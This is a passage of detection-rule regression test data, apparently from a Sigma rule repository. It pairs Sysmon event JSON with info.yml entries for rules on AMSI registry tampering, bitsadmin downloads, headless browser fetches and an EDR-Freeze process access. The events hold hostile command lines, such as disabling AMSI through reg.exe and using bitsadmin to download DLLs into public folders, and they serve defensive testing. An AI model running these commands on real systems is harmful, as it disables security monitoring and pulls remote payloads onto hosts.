regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/9f5c1d59-33be-4e60-bcab-85d2f566effd.evtx
================================================
FILE: regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/387df17d-3b04-448f-8669-9e7fd5e5fd8c.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 10,
"Version": 3,
"Level": 4,
"Task": 10,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-11-27T07:22:22.033828Z"
}
},
"EventRecordID": 445923,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3544,
"ThreadID": 4264
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-11-27 07:22:22.031",
"SourceProcessGUID": "0197231E-FC2D-6927-810B-000000000D00",
"SourceProcessId": 7224,
"SourceThreadId": 4144,
"SourceImage": "C:\\Windows\\System32\\WerFaultSecure.exe",
"TargetProcessGUID": "0197231E-2DD8-691E-4D00-000000000D00",
"TargetProcessId": 3472,
"TargetImage": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25100.9008-0\\MsMpEng.exe",
"GrantedAccess": "0x1fffff",
"CallTrace": "C:\\WINDOWS\\SYSTEM32\\ntdll.dll+1284|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+185c4|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+4fe50|C:\\Windows\\System32\\dbgcore.DLL+164cc|C:\\Windows\\System32\\dbgcore.DLL+23e6c|C:\\Windows\\System32\\dbgcore.DLL+1b230|C:\\Windows\\System32\\dbgcore.DLL+112b4|C:\\Windows\\System32\\dbgcore.DLL+117a8|C:\\Windows\\System32\\WerFaultSecure.exe+115a4|C:\\Windows\\System32\\WerFaultSecure.exe+6a9c|C:\\Windows\\System32\\WerFaultSecure.exe+7378|C:\\Windows\\System32\\WerFaultSecure.exe+834c|C:\\Windows\\System32\\WerFaultSecure.exe+2748|C:\\Windows\\System32\\WerFaultSecure.exe+27e4|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+8740|C:\\WINDOWS\\SYSTEM32\\ntdll.dll+d4464",
"SourceUser": "swachchhanda\\xodih",
"TargetUser": "NT AUTHORITY\\SYSTEM"
}
}
}
================================================
FILE: regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/info.yml
================================================
id: bd66a891-01c3-40b6-aafd-5c1676b44cf3
description: N/A
date: 2025-11-27
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 387df17d-3b04-448f-8669-9e7fd5e5fd8c
title: Suspicious Process Access of MsMpEng by WerFaultSecure - EDR-Freeze
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/387df17d-3b04-448f-8669-9e7fd5e5fd8c.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/7dbbcac2-57a0-45ac-b306-ff30a8bd2981.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-25T14:30:27.369114Z"
}
},
"EventRecordID": 16094,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-25 14:30:27.352",
"ProcessGuid": "0197231E-4A83-694D-9E0E-000000000800",
"ProcessId": 14144,
"Image": "C:\\Windows\\System32\\reg.exe",
"FileVersion": "10.0.26100.1 (WinBuild.160101.0800)",
"Description": "Registry Console Tool",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "reg.exe",
"CommandLine": "\"C:\\WINDOWS\\system32\\reg.exe\" add \"HKCU\\Software\\Microsoft\\Windows Script\\Settings\" /v AmsiEnable /t REG_DWORD /d 0 /f",
"CurrentDirectory": "C:\\WINDOWS\\system32\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000",
"LogonId": "0x3144c",
"TerminalSessionId": 1,
"IntegrityLevel": "High",
"Hashes": "MD5=573EB13AC2BA31E9C2E17FB6DAD14154,SHA256=E295E776FD4F7F73DFAAA5698A19EA7A2F4A2F0C5E1681FAC94E45D00296C926,IMPHASH=A26BCB048DF34CBB422F2656F38634D0",
"ParentProcessGuid": "0197231E-EC48-694C-AA0C-000000000800",
"ParentProcessId": 12456,
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/info.yml
================================================
id: 242d26e0-1ce5-4a34-960d-144f34f60e37
description: N/A
date: 2025-12-25
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981
title: Windows AMSI Related Registry Tampering Via CommandLine
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/7dbbcac2-57a0-45ac-b306-ff30a8bd2981.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/d059842b-6b9d-4ed1-b5c3-5b89143c6ede.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-10T04:33:20.562782Z"
}
},
"EventRecordID": 18463,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-10 04:33:20.557",
"ProcessGuid": "0197231E-F810-6938-B710-000000000800",
"ProcessId": 7732,
"Image": "C:\\Windows\\System32\\bitsadmin.exe",
"FileVersion": "7.8.26100.1 (WinBuild.160101.0800)",
"Description": "BITS administration utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "bitsadmin.exe",
"CommandLine": "bitsadmin /transfer n https://www.atomicredteam.io/atomic-red-team/atomics/T1218.011 hello.html",
"CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30",
"ParentProcessGuid": "00000000-0000-0000-0000-000000000000",
"ParentProcessId": 14736,
"ParentImage": "-",
"ParentCommandLine": "-",
"ParentUser": "-"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/info.yml
================================================
id: 83c4dfac-7b5b-4a0e-803e-cca15c933c5e
description: N/A
date: 2025-12-10
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: d059842b-6b9d-4ed1-b5c3-5b89143c6ede
title: File Download Via Bitsadmin
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/d059842b-6b9d-4ed1-b5c3-5b89143c6ede.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/99c840f2-2012-46fd-9141-c761987550ef.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-10T04:44:13.414345Z"
}
},
"EventRecordID": 18552,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-10 04:44:13.371",
"ProcessGuid": "0197231E-FA9D-6938-D910-000000000800",
"ProcessId": 9532,
"Image": "C:\\Windows\\System32\\bitsadmin.exe",
"FileVersion": "7.8.26100.1 (WinBuild.160101.0800)",
"Description": "BITS administration utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "bitsadmin.exe",
"CommandLine": "bitsadmin /transfer n https://12.34.45.67/calc.dll C:\\Users\\Public\\calc.dll",
"CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30",
"ParentProcessGuid": "00000000-0000-0000-0000-000000000000",
"ParentProcessId": 14736,
"ParentImage": "-",
"ParentCommandLine": "-",
"ParentUser": "-"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/info.yml
================================================
id: 3e393301-93d2-4759-b4d6-b957bdc0ae32
description: N/A
date: 2025-12-10
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 99c840f2-2012-46fd-9141-c761987550ef
title: Suspicious Download From Direct IP Via Bitsadmin
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/99c840f2-2012-46fd-9141-c761987550ef.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/8518ed3d-f7c9-4601-a26c-f361a4256a0c.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-10T04:47:28.250802Z"
}
},
"EventRecordID": 18580,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-10 04:47:28.224",
"ProcessGuid": "0197231E-FB60-6938-DD10-000000000800",
"ProcessId": 8924,
"Image": "C:\\Windows\\System32\\bitsadmin.exe",
"FileVersion": "7.8.26100.1 (WinBuild.160101.0800)",
"Description": "BITS administration utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "bitsadmin.exe",
"CommandLine": "bitsadmin /transfer n https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1047/bin/calc.dll C:\\Users\\Public\\Music\\calc.dll",
"CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30",
"ParentProcessGuid": "00000000-0000-0000-0000-000000000000",
"ParentProcessId": 14736,
"ParentImage": "-",
"ParentCommandLine": "-",
"ParentUser": "-"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/info.yml
================================================
id: 4788a4ef-6b50-4b68-9d10-d5471bd5fa02
description: N/A
date: 2025-12-10
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 8518ed3d-f7c9-4601-a26c-f361a4256a0c
title: Suspicious Download From File-Sharing Website Via Bitsadmin
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/8518ed3d-f7c9-4601-a26c-f361a4256a0c.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-10T04:22:10.216650Z"
}
},
"EventRecordID": 18325,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-10 04:22:10.201",
"ProcessGuid": "0197231E-F572-6938-8B10-000000000800",
"ProcessId": 13808,
"Image": "C:\\Windows\\System32\\bitsadmin.exe",
"FileVersion": "7.8.26100.1 (WinBuild.160101.0800)",
"Description": "BITS administration utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "bitsadmin.exe",
"CommandLine": "bitsadmin /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll C:\\Users\\xodih\\AppData\\Local\\Temp\\calc.dll",
"CurrentDirectory": "C:\\Program Files\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30",
"ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
"ParentProcessId": 14736,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/info.yml
================================================
id: 7149a708-0d83-4917-8478-24e682260b6f
description: N/A
date: 2025-12-10
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200
title: File With Suspicious Extension Downloaded Via Bitsadmin
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/2ddef153-167b-4e89-86b6-757a9e65dcac.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-10T04:29:18.813904Z"
}
},
"EventRecordID": 18412,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-10 04:29:18.786",
"ProcessGuid": "0197231E-F71E-6938-AE10-000000000800",
"ProcessId": 4432,
"Image": "C:\\Windows\\System32\\bitsadmin.exe",
"FileVersion": "7.8.26100.1 (WinBuild.160101.0800)",
"Description": "BITS administration utility",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "bitsadmin.exe",
"CommandLine": "bitsadmin /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll C:\\Users\\Public\\calc.dll",
"CurrentDirectory": "C:\\Program Files\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30",
"ParentProcessGuid": "00000000-0000-0000-0000-000000000000",
"ParentProcessId": 14736,
"ParentImage": "-",
"ParentCommandLine": "-",
"ParentUser": "-"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/info.yml
================================================
id: 5e620f3d-549d-4515-ae46-981d30ac4683
description: N/A
date: 2025-12-10
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 2ddef153-167b-4e89-86b6-757a9e65dcac
title: File Download Via Bitsadmin To A Suspicious Target Folder
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/2ddef153-167b-4e89-86b6-757a9e65dcac.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T23:20:06.319147Z"
}
},
"EventRecordID": 32822341,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-26 23:20:06.307",
"ProcessGuid": "5AA13A44-ACA6-68FE-DE5D-000000004002",
"ProcessId": 9184,
"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
"FileVersion": "141.0.7390.123",
"Description": "Google Chrome",
"Product": "Google Chrome",
"Company": "Google LLC",
"OriginalFileName": "chrome.exe",
"CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --headless --enable-logging --disable-gpu --dump-dom \"http://10.0.1.14/nas.txt\"",
"CurrentDirectory": "C:\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E",
"ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ParentProcessId": 10048,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml
================================================
id: 941b970d-535f-4543-8985-768e589fa8ff
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e
title: File Download with Headless Browser
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T23:25:03.181097Z"
}
},
"EventRecordID": 32923086,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-26 23:25:03.169",
"ProcessGuid": "5AA13A44-ADCF-68FE-295E-000000004002",
"ProcessId": 4788,
"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
"FileVersion": "141.0.7390.123",
"Description": "Google Chrome",
"Product": "Google Chrome",
"Company": "Google LLC",
"OriginalFileName": "chrome.exe",
"CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --load-extension=\"C:\\Users\\user\\AppData\\Local\\Temp\\HHe2lr\"",
"CurrentDirectory": "C:\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E",
"ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ParentProcessId": 10048,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml
================================================
id: e159e6ce-c717-4a38-af44-ff8c4f011c37
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21
title: Chromium Browser Instance Executed With Custom Extension
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T23:28:43.862519Z"
}
},
"EventRecordID": 32995046,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-26 23:28:43.810",
"ProcessGuid": "5AA13A44-AEAB-68FE-435E-000000004002",
"ProcessId": 5784,
"Image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
"FileVersion": "141.0.3537.99",
"Description": "Microsoft Edge",
"Product": "Microsoft Edge",
"Company": "Microsoft Corporation",
"OriginalFileName": "msedge.exe",
"CommandLine": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --headless=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709",
"CurrentDirectory": "C:\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D",
"ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ParentProcessId": 10048,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml
================================================
id: 686da1dd-caec-47d8-a254-07ab54f1f3c7
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 1c526788-0abe-4713-862f-b520da5e5316
title: Chromium Browser Headless Execution To Mockbin Like Site
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
